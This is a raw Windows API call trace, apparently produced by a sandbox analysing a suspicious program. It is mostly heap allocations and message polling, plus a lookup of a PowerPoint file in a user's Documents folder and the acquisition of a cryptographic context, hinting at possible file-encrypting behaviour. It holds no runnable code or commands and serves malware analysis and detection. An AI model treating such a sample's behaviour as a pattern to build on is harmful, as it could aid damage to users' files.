(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.591] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0267.591] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0267.592] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.592] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.592] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0267.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0267.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0267.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.593] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.593] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0267.593] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0267.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0267.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0267.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0267.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.594] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.594] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0267.594] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/vai5o9F.pptx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaadf30, ftCreationTime.dwHighDateTime=0x1d5b702, ftLastAccessTime.dwLowDateTime=0xdfa92990, ftLastAccessTime.dwHighDateTime=0x1d581a5, ftLastWriteTime.dwLowDateTime=0xdfa92990, ftLastWriteTime.dwHighDateTime=0x1d581a5, nFileSizeHigh=0x0, nFileSizeLow=0x11319, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="vai5o9F.pptx", cAlternateFileName="VAI5O9~1.PPT")) returned 0xa87250 [0267.594] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0267.595] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.595] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0267.595] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0267.596] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0267.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.596] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0267.596] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0267.596] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.596] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0267.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0267.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.597] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0267.597] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0267.597] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.597] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.598] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0267.598] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0267.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.598] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0267.599] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0267.599] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.599] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0267.599] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0267.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0267.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69b08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0267.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0267.600] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0267.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0267.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0267.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e69928 [0267.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0267.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0267.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.600] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0267.600] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0267.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0267.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0267.601] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0267.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0267.601] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0267.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0267.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0267.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.602] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.602] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.602] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.602] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0267.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.602] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.603] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.603] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0267.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0267.603] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0267.603] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 